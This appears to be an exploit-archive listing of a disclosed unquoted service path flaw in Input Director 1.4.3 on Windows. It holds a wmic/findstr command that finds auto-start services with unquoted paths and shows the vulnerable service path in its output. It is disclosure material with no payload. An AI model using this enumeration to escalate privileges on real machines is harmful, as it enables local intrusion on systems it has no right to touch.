Input director 1.4.3 input director unquoted service path Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-09-09 |
Type : local |
Platform : windows
This exploit / vulnerability Input director 1.4.3 input director unquoted service path is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Input Director 1.4.3 - 'Input Director' Unquoted Service Path
# Discovery Date: 2020-09-08
# Response from Input Director Support: 09/09/2020
# Exploit Author: TOUHAMI Kasbaoui
# Vendor Homepage: https://www.inputdirector.com/
# Version: 1.4.3
# Tested on: Windows Server 2012, Windows 10
# Find the Unquoted Service Path Vulnerability:
C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto"
| findstr /i /v "c:\windows\\" | findstr /i /v """
Input Director Service InputDirector C:\Program Files
(x86)\InputDirector\IDWinService.exe Auto